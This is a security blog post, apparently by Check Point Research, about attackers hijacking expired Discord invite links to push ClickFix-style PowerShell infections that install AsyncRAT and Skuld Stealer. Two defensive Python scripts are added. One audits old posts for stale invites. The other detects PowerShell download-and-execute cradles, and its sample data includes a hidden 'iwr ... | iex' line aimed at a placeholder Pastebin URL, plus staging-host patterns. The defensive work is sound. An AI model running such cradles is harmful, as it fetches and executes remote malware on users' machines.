Attacks via Discord: The dark side of invitations


30 June 2025

Discord is a widely used and trusted platform preferred by gamers, communities, businesses, and others who need to connect securely and quickly. In a recent investigation, Check Point Research (CPR) uncovered a flaw in Discord's invitation system that allows attackers to hijack expired or deleted invitation links and secretly redirect unsuspecting users to malicious servers. Invitation links posted by trusted communities months ago on forums, social media or official websites could now silently lead users into the hands of cybercriminals.

Check Point Research (CPR) observed real-world attacks in which threat actors leveraged hijacked links to deploy sophisticated phishing and malware campaigns. These included multi-stage infections that evaded detection by antivirus tools and sandbox controls, ultimately delivering malware such as AsyncRAT and Skuld Stealer. Below is an analysis of the attack chain and practical advice on protecting against such attacks.

The Hidden Danger in Discord Invite Links

Discord offers three kinds of invite link: temporary, permanent, and custom (vanity) links. Temporary links expire after a set period of time, permanent links never expire, and custom links are human-readable URLs available only to servers with premium status (Level 3 Boost). Our research revealed that attackers can exploit the way Discord handles expired or deleted invitation codes — especially vanity links. When a custom invite link expires or a server loses its boosted status, the invite code becomes available for registration again. Attackers can then claim the same code and redirect users to a malicious server.

In many cases, users encounter these links in old, trusted sources and have no reason to suspect that anything is wrong. To make matters worse, the Discord app sometimes gives users the false impression that temporary links have become permanent, which increases the number of invite codes that can be hijacked.
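As an added example (not part of the original post and not CPR's tooling), the following Python script shows how a community or server owner could audit text they published in the past (forum posts, wiki pages, tweets) for Discord invite links and rank the ones most worth re-checking. The invite URL regex follows the public discord.gg and discord.com/invite link formats; the rule used to tell vanity codes from auto-generated ones, the 90-day staleness threshold and the sample posts are assumptions made for this example.

```python
import re
from dataclasses import dataclass
from datetime import date

# Invite URL shapes Discord hands out: discord.gg/<code> and discord.com/invite/<code>.
INVITE_RE = re.compile(
    r"https?://(?:www\.)?(?:discord\.gg|discord(?:app)?\.com/invite)/([A-Za-z0-9-]+)",
    re.IGNORECASE,
)

# Assumption (this example's heuristic, not a documented Discord rule): auto-generated
# codes are short random mixed-case alphanumerics, while vanity codes are human-chosen
# words, often all lowercase or hyphenated.
RANDOM_CODE_RE = re.compile(r"^(?=.*[A-Z])(?=.*[a-z])[A-Za-z0-9]{7,10}$")

# Assumption: links older than this many days are worth re-verifying by hand.
STALE_AFTER_DAYS = 90


@dataclass
class Finding:
    source: str     # where the link was published
    code: str       # the invite code itself
    kind: str       # "vanity" or "random"
    age_days: int
    priority: str   # "high", "medium" or "low"


def classify_code(code: str) -> str:
    return "random" if RANDOM_CODE_RE.match(code) else "vanity"


def audit(posts, today: date, stale_after_days: int = STALE_AFTER_DAYS):
    """posts: iterable of (source, posted_on, text). Returns one Finding per invite link."""
    findings = []
    for source, posted_on, text in posts:
        age = (today - posted_on).days
        for code in INVITE_RE.findall(text):
            kind = classify_code(code)
            if age <= stale_after_days:
                priority = "low"
            elif kind == "vanity":
                # A vanity code can be claimed by someone else once the original server
                # loses Level 3 Boost or the link lapses, so stale vanity links come first.
                priority = "high"
            else:
                priority = "medium"
            findings.append(Finding(source, code, kind, age, priority))
    return findings


# Constructed sample of previously published content (not real servers or links).
SAMPLE_POSTS = [
    ("forum-thread", date(2024, 11, 1), "Join us: https://discord.gg/coolgamers"),
    ("tweet", date(2025, 6, 20), "Fresh invite: https://discord.gg/aB3kXq9Zt"),
    ("wiki-page", date(2024, 1, 15),
     "Support: https://discord.com/invite/my-community or https://discord.gg/Qw8rTz2Lp"),
]


def audit_sample():
    """Runs the audit over the constructed posts as of the post's publication date."""
    return audit(SAMPLE_POSTS, today=date(2025, 6, 30))


def needs_review(findings):
    """Codes to re-check manually, highest priority first."""
    order = {"high": 0, "medium": 1, "low": 2}
    return [(f.code, f.priority)
            for f in sorted(findings, key=lambda f: order[f.priority])
            if f.priority != "low"]


if __name__ == "__main__":
    for code, priority in needs_review(audit_sample()):
        print(f"{priority:6} {code}")
```

The output is a worklist, not a verdict: each flagged code still has to be opened and compared against the server it was originally meant to point to, and a link that now lands somewhere unexpected should be edited out of the old post or replaced.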

From Trusted Links to Malicious Servers

Once an invite link is hijacked, attackers redirect users to malicious servers that mimic legitimate Discord servers. Newcomers usually find that most channels are locked, except for one called ‘verification.’ Here, a fake bot named ‘Safeguard’ asks users to complete a verification step.

Clicking on ‘verification’ initiates an OAuth2 flow and redirects users to a phishing website that closely resembles Discord. The website copies a malicious PowerShell command to the clipboard and guides users through a fake verification process. This technique, known as ‘ClickFix,’ tricks users into pasting and executing the command in the Windows ‘Run’ dialogue box.

Once executed, the PowerShell script downloads additional components from Pastebin and GitHub, initiating a multi-stage infection chain. Ultimately, the system is infected with payloads such as AsyncRAT, which gives attackers remote control, and Skuld Stealer, which targets browser credentials and cryptocurrency wallets.
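The ClickFix step described above, and the later download stages, leave a recognisable trace in endpoint telemetry: a PowerShell process started by explorer.exe (which is what launches commands typed into the Run dialogue box) whose command line fetches something from a paste or code-hosting site and runs it. The following Python detection is an added example, not code from the original post or from CPR; it scores constructed process-creation events in a simple key=value format of its own (not a vendor's schema), and the URLs in the sample are placeholders. It also covers the ‘never execute unknown commands’ advice in the protection section, since it is the corresponding detection on the endpoint side.

```python
import re
from dataclasses import dataclass

# key=value tokens; double-quoted values may contain spaces (example's own format).
EVENT_RE = re.compile(r'(\w+)=("[^"]*"|\S+)')

# Staging services named in the write-up; a tuning list, not an exhaustive one.
STAGING_HOSTS = ("pastebin.com/raw", "raw.githubusercontent.com", "bitbucket.org")
# Download-and-run cradle verbs typical of ClickFix one-liners.
CRADLE_RE = re.compile(r"\b(iex|invoke-expression|iwr|invoke-webrequest|downloadstring)\b", re.I)
HIDDEN_RE = re.compile(r"-w(?:indowstyle)?\s+hidden", re.I)


@dataclass
class Alert:
    ts: str
    host: str
    reasons: list


def parse_event(line: str) -> dict:
    return {k: v.strip('"') for k, v in EVENT_RE.findall(line)}


def assess(event: dict) -> list:
    """Returns the suspicious traits found on one process-creation event."""
    reasons = []
    if event.get("image", "").lower() not in ("powershell.exe", "pwsh.exe"):
        return reasons
    cmd = event.get("cmd", "")
    # The Run dialog (Win+R) launches its command through explorer.exe, so a user pasting
    # a clipboard one-liner shows up with explorer.exe as the parent process.
    if event.get("parent", "").lower() == "explorer.exe":
        reasons.append("powershell spawned by explorer.exe (Run dialog or shell launch)")
    if CRADLE_RE.search(cmd):
        reasons.append("download-and-execute cradle in command line")
    if any(h in cmd.lower() for h in STAGING_HOSTS):
        reasons.append("payload fetched from paste/code-hosting service")
    if HIDDEN_RE.search(cmd):
        reasons.append("hidden window requested")
    return reasons


def detect(lines, min_reasons: int = 2):
    """Raises an Alert for each event carrying at least min_reasons suspicious traits."""
    alerts = []
    for line in lines:
        ev = parse_event(line)
        reasons = assess(ev)
        if len(reasons) >= min_reasons:
            alerts.append(Alert(ev.get("ts", ""), ev.get("host", ""), reasons))
    return alerts


# Constructed sample events (placeholder URLs, invented hosts).
SAMPLE_EVENTS = [
    # ClickFix pattern: clipboard command pasted into Win+R, so explorer.exe is the parent.
    'ts=2025-06-30T10:01:02Z host=WS01 parent=explorer.exe image=powershell.exe '
    'cmd="powershell -w hidden -c iwr https://pastebin.com/raw/PLACEHOLDER | iex"',
    # Routine scripted maintenance launched from a batch file: nothing to flag.
    'ts=2025-06-30T10:05:40Z host=WS02 parent=cmd.exe image=powershell.exe '
    'cmd="powershell -File Backup.ps1"',
    # User opened an interactive shell from the Start menu: explorer parent alone is not enough.
    'ts=2025-06-30T10:07:11Z host=WS03 parent=explorer.exe image=powershell.exe '
    'cmd="powershell"',
    # Later stage: a scheduled task (Task Scheduler runs inside svchost.exe) pulling the
    # next component from GitHub.
    'ts=2025-06-30T10:09:55Z host=WS07 parent=svchost.exe image=pwsh.exe '
    'cmd="pwsh -c Invoke-WebRequest https://raw.githubusercontent.com/PLACEHOLDER/stage2 -OutFile s2.bin"',
]


def detect_sample():
    return detect(SAMPLE_EVENTS)


if __name__ == "__main__":
    for a in detect_sample():
        print(a.ts, a.host, "; ".join(a.reasons))
```

The threshold is deliberately a count rather than a single rule: explorer.exe as parent is normal for a user opening a shell, and a raw GitHub download is normal for many admin scripts, but the combination of a Run-dialog launch, a cradle verb and a paste site on one command line is what the campaign looks like. Tune `min_reasons` and `STAGING_HOSTS` to your environment.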

An Expanding and Evolving Campaign

This campaign is not static. We have seen the attackers periodically update their downloader to maintain a zero detection rate on VirusTotal. We also identified a parallel campaign targeting gamers. Here, the initial loader was embedded in a Trojanised cheat tool for The Sims 4, demonstrating the attackers' flexibility in targeting different user groups.

Impact and Scope

The exact number of victims is difficult to determine because the campaign exfiltrates data covertly through Discord webhooks. However, download statistics from the repositories used in the campaign indicate over 1,300 downloads. Victims were scattered across the globe, including the US, Vietnam, France, Germany, the UK, and other countries.

The focus on stealing credentials and cryptocurrency wallet data suggests a clear financial motive behind the attack.

A Trusted Platform Turned Trojan Horse

This campaign shows how a subtle feature of Discord's invitation system can be turned into a weapon. By compromising trusted links, attackers created an effective attack chain that combined social engineering with the abuse of legitimate services such as GitHub, Bitbucket, and Pastebin.

Rather than using heavy obfuscation, the threat actors relied on simpler, more stealthy techniques such as behaviour-based execution, scheduled tasks, and delayed payload decryption.

This campaign highlights the increasing complexity of social engineering attacks that exploit user trust. Instead of relying on heavily obfuscated malware, the attackers used legitimate services and simple behavioural tricks to avoid detection, showing how easily popular platforms can be manipulated when basic functions — such as invitation link management — remain insecure.

Discord has since disabled the malicious bot used in this campaign, but the basic tactics remain viable. Attackers can easily register new bots or change vectors while continuing to exploit the invite system.

Stay protected

1. Double-check invite links - Always check Discord invite URLs before clicking. If a link comes from an old source (e.g., a forum post or tweet), verify its legitimacy first.

2. Prefer permanent invite links - When managing your own Discord servers, create permanent (non-expiring) invite links. Avoid publicly posting temporary invites.

3. Check for the ‘Verified App’ badge before authorising bots - Only interact with bots that display Discord's official ‘Verified App’ badge. Unverified bots may be malicious.

4. Never execute unknown commands - No legitimate Discord server or verification process should ever require you to execute PowerShell commands or paste anything into your system terminal. Stop and investigate if you are asked to do so.

5. Adopt multi-layered defences - For organisations, combine security awareness training with endpoint protection, phishing detection and browser security tools that can stop threats before they are executed.

6. Leverage proactive protection - Check Point Threat Emulation provides real-time prevention against advanced malware, phishing tactics and file-based threats, such as those used in this campaign, across web, email and collaboration tools. Behavioural analysis and sandboxing capabilities offer critical protection against evolving social engineering attacks and multi-stage malware attacks.
